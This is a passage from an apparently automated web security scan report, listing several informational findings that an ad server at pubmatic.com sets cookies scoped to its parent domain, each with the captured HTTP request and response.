The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23101&kadwidth=160&kadheight=600&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A4%3A16&ranreq=0.6765466905198991&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=50772453&rk1=49226856&rk2=1316239456.221&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:02:50 GMT
Content-Length: 1563
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:02:50 GMT; path=/
Set-Cookie: pubfreq_27331_23101_261214099=661-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:42:50 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAA9WgAAAAAAAAAA
...[SNIP]...

11.153. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=136&prevkadIds=22455_22455&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame32733027331&kltstamp=2011-8-17%201%3A8%3A24&ranreq=0.10853273188695312&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:58 GMT
Content-Length: 1205
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:58 GMT; path=/
Set-Cookie: pubfreq_27331_22455_1402739245=139-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:58 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame32733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

11.154. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22454&kadwidth=300&kadheight=250&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A43&ranreq=0.1066701749805361&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414207&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=24942526&rk1=75947666&rk2=1316239663.497&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:17 GMT
Content-Length: 1177
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:17 GMT; path=/
Set-Cookie: pubfreq_27331_22454_1965058357=776-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:17 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC2VwAAAAAAAAAA
...[SNIP]...

11.155. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A46&ranreq=0.29180969577282667&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=11415325&rk1=4961111&rk2=1316239725.757&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:20 GMT
Content-Length: 1307
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:07:20 GMT; path=/
Set-Cookie: pubfreq_27331_22455_815454125=661-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:47:20 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

11.156. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A43&ranreq=0.6440964669454843&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=54474395&rk1=24255064&rk2=1316239663.519&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:17 GMT
Content-Length: 1310
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:17 GMT; path=/
Set-Cookie: pubfreq_27331_22455_882181560=661-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:17 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

11.157. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A45&ranreq=0.2675711310002953&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=60719089&rk1=94605455&rk2=1316239725.491&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:19 GMT
Content-Length: 1832
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:07:19 GMT; path=/
Set-Cookie: _curtime=1316221639; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:17:19 GMT; path=/
Set-Cookie: pubfreq_27331_23103_1477666717=243-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:47:19 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwi
...[SNIP]...

11.158. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A2&ranreq=0.11398947122506797&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:03:36 GMT
Content-Length: 1858
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:03:36 GMT; path=/
Set-Cookie: pubfreq_27331_22455_693123037=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:43:36 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:03:36 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

11.159. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=661&prevkadIds=22455&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame22733027331&kltstamp=2011-8-17%201%3A5%3A6&ranreq=0.08744174614548683&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=20562183&rk1=63496433&rk2=1316239504.461&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:03:40 GMT
Content-Length: 1381
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:03:40 GMT; path=/
Set-Cookie: pubfreq_27331_22455_752365815=325-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:43:40 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame22733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

11.160. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A22&ranreq=0.5897327524144202&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Finside_track%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
